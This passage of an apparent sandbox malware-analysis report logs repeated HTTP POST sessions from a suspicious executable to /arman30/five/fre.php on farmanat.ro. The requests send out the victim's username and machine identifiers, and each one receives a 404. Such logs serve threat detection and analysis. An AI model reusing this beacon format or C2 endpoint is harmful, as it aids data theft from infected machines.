                                              Date: Thu, 25 Nov 2021 09:50:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              244192.168.11.2050086176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:14.643841982 CET6658OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:14.678226948 CET6659OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:14.729454994 CET6659INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              245192.168.11.2050087176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:15.146123886 CET6660OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:15.179420948 CET6660OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:15.229315996 CET6660INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              246192.168.11.2050088176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:15.653331041 CET6661OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:15.687103987 CET6661OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:15.736463070 CET6662INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              247192.168.11.2050089176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:16.166461945 CET6662OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:16.200181961 CET6663OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:16.252347946 CET6663INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              248192.168.11.2050090176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:16.686570883 CET6664OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:16.720089912 CET6664OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:16.771271944 CET6664INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              249192.168.11.2050091176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:17.195199013 CET6665OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:17.229708910 CET6665OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:17.283452988 CET6666INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              25192.168.11.2049860176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:17.734632015 CET6339OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:17.768721104 CET6340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:17.821785927 CET6340INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              250192.168.11.2050092176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:17.638428926 CET6666OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:17.671746016 CET6667OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:17.720838070 CET6667INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              251192.168.11.2050093176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:18.158986092 CET6668OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:18.193180084 CET6668OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:18.244380951 CET6668INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              252192.168.11.2050094176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:18.673645020 CET6669OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:18.707741976 CET6669OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:18.757035971 CET6670INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              253192.168.11.2050095176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:19.184221983 CET6670OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:19.217792988 CET6671OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:19.270900965 CET6671INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              254192.168.11.2050096176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:19.685636044 CET6672OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:19.719994068 CET6672OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:19.776088953 CET6672INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              255192.168.11.2050097176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:20.207252979 CET6673OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:20.241003990 CET6673OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:20.294841051 CET6674INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              256192.168.11.2050098176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:20.723423958 CET6674OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:20.756654024 CET6675OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:20.805862904 CET6675INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              257192.168.11.2050099176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:21.159996986 CET6676OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:21.193694115 CET6676OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:21.243401051 CET6676INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              258192.168.11.2050100176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:21.648991108 CET6677OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:21.682538033 CET6677OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:21.732023001 CET6678INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              259192.168.11.2050101176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:22.166712999 CET6678OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:22.200891018 CET6679OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:22.252677917 CET6679INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              26192.168.11.2049861176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:18.417273998 CET6341OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:18.450839996 CET6341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:18.506346941 CET6341INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              260192.168.11.2050102176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:22.680855989 CET6680OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
